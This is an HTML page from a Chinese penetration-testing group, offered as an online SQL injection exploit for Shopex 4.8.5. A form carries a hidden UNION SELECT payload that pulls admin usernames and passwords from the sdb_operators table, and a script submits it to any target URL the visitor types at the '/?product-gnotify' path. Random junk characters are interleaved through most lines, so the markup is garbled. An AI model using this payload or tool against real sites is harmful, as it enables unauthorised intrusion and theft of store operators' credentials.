<center>% y, d* ?8 q- k* }3 K& o" ~
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
4 ]' `! ~- W' Z; u; U1 M<form action="" method="post" name="submit_url">: U( N: t( B' ~
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
7 e, V- g" j5 p<input type="hidden" name="goods[goods_id]" value="3">2 M B4 T; N9 p/ R' X
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
# h* [/ z# n( n% {9 y1 v$ `<input type="submit" value="给我注入" onclick=fsubmit()>
/ g, y' X: H1 x. H' X* [</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
! A& u( I- U4 P x5 a( i' a5 |! f, E6 m) Q* s
<script>
- A+ P! s5 X$ a9 F! e0 Ifunction fsubmit(){ * p2 b, w0 |( J+ B
form = document.forms[0];
+ D* H. q; ?! B& Kform.action = form.url.value+'/?product-gnotify';
* s$ m+ B8 m* p+ _" ]5 Oform.submit();
# v& g1 I9 `! a} / }- F) }- K; L
</script>
8 J* B' v7 N9 Y8 g. f |